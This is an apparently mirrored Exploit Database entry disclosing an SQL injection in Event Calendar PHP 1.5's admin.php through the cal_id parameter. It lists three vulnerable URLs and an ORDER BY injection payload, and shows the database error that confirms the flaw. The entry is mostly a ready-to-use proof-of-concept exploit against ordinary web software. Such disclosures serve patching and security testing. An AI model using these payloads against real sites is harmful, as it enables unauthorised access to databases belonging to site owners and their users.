Event Calendar PHP 1.5 – SQL Injection

• Exploit Database
• 16 阅读

• 作者： Ehsan Hosseini
  日期： 2016-10-20
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/40594/

• =====================================================
  # Event Calendar PHP 1.5 - SQL Injection
  =====================================================
  # Vendor Homepage: http://eventcalendarphp.com/
  # Date: 21 Oct 2016
  # Version : 1.5
  # Platform : WebApp - PHP
  # Author: Ashiyane Digital Security Team
  # Contact: hehsan979@gmail.com
  =====================================================
  # PoC:
  Vulnerable Url:
  http://localhost/eventcalendar/admin.php?act=options&cal_id=[payload]
  http://localhost/eventcalendar/admin.php?act=cal_options&cal_id=[payload]
  http://localhost/eventcalendar/admin.php?act=cal_language&cal_id=[payload]
  Vulnerable parameter : cal_id
  Mehod : GET
  
  A simple inject :
  Payload : '+order+by+20--+
  http://localhost/eventcalendar/admin.php?act=options&cal_id=1'+order+by+20--+
  
  In response can see result :
  query error: SELECT * FROM pa_ecal_calendars WHERE cal_id='1' order by
  20-- '. Error: Unknown column '20' in 'order clause'
  
  Result of payload: Error: Unknown column '20' in 'order clause'
  =====================================================
  # Discovered By : Ehsan Hosseini
  =====================================================